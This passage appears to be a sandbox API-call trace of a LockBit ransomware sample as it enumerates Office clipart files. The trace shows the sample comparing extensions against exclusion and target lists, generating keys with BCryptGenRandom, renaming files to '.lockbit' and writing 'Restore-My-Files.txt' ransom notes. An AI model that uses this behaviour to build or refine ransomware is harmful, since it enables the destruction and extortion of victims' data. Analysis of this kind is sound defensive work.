lpString2="PE00272_.WMF") returned -1 [0166.343] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.343] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00272_.WMF") returned=".WMF" [0166.343] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.343] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.343] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.344] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.344] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00272_.WMF.lockbit") returned 72 [0166.344] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00272_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00272_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0166.347] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.347] malloc (_Size=0x40068) returned 0x1ff1e60 [0166.347] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2804) returned 1 [0166.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0166.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0166.348] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0166.354] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00272_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00272_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.354] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.354] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0166.354] free (_Block=0x1fa2ed8) [0166.354] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00272_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.354] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.354] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.354] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c9b200, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb0c9b200, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x5aa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00468_.WMF", cAlternateFileName="")) returned 1 [0166.354] lstrcmpiW (lpString1=".", lpString2="PE00468_.WMF") returned -1 [0166.354] lstrcmpiW (lpString1="..", lpString2="PE00468_.WMF") returned -1 [0166.354] PathFindExtensionW (pszPath="PE00468_.WMF") returned=".WMF" [0166.354] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.354] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.354] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.354] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.355] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.356] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.356] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00468_.WMF") returned 1 [0166.357] lstrcmpiW (lpString1="ntldr", lpString2="PE00468_.WMF") returned -1 [0166.357] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00468_.WMF") returned -1 [0166.357] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00468_.WMF") returned -1 [0166.357] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00468_.WMF") returned -1 [0166.357] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00468_.WMF") returned 1 [0166.357] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00468_.WMF") returned -1 [0166.357] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.357] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00468_.WMF") returned=".WMF" [0166.357] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.357] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.357] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.358] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.358] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00468_.WMF.lockbit") returned 72 [0166.358] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00468_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00468_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0166.360] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.360] malloc (_Size=0x40068) returned 0x1ff1e60 [0166.360] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=23204) returned 1 [0166.360] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.360] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.360] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0166.360] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0166.361] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.366] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00468_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00468_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.366] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.366] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.368] free (_Block=0x1fa2ed8) [0166.368] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00468_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.368] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.368] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.368] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d320700, ftCreationTime.dwHighDateTime=0x1bd4b43, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8d320700, ftLastWriteTime.dwHighDateTime=0x1bd4b43, nFileSizeHigh=0x0, nFileSizeLow=0x1cf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00478_.WMF", cAlternateFileName="")) returned 1 [0166.368] lstrcmpiW (lpString1=".", lpString2="PE00478_.WMF") returned -1 [0166.368] lstrcmpiW (lpString1="..", lpString2="PE00478_.WMF") returned -1 [0166.368] PathFindExtensionW (pszPath="PE00478_.WMF") returned=".WMF" [0166.369] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.369] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.371] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.371] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.372] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00478_.WMF") returned 1 [0166.372] lstrcmpiW (lpString1="ntldr", lpString2="PE00478_.WMF") returned -1 [0166.372] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00478_.WMF") returned -1 [0166.372] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00478_.WMF") returned -1 [0166.372] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00478_.WMF") returned -1 [0166.372] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00478_.WMF") returned 1 [0166.373] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00478_.WMF") returned -1 [0166.373] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.373] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00478_.WMF") returned=".WMF" [0166.373] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.373] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.373] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.374] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.374] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.374] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.374] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.374] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.374] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.374] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.374] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.374] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00478_.WMF.lockbit") returned 72 [0166.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00478_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00478_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0166.375] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.375] malloc (_Size=0x40068) returned 0x1ff1e60 [0166.375] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7416) returned 1 [0166.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0166.376] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0166.377] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.383] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00478_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00478_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.383] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.384] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0166.384] free (_Block=0x1fa2ed8) [0166.384] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00478_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.384] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.384] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.384] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb32c0c00, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x59c8edf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb32c0c00, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x4124, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00485_.WMF", cAlternateFileName="")) returned 1 [0166.384] lstrcmpiW (lpString1=".", lpString2="PE00485_.WMF") returned -1 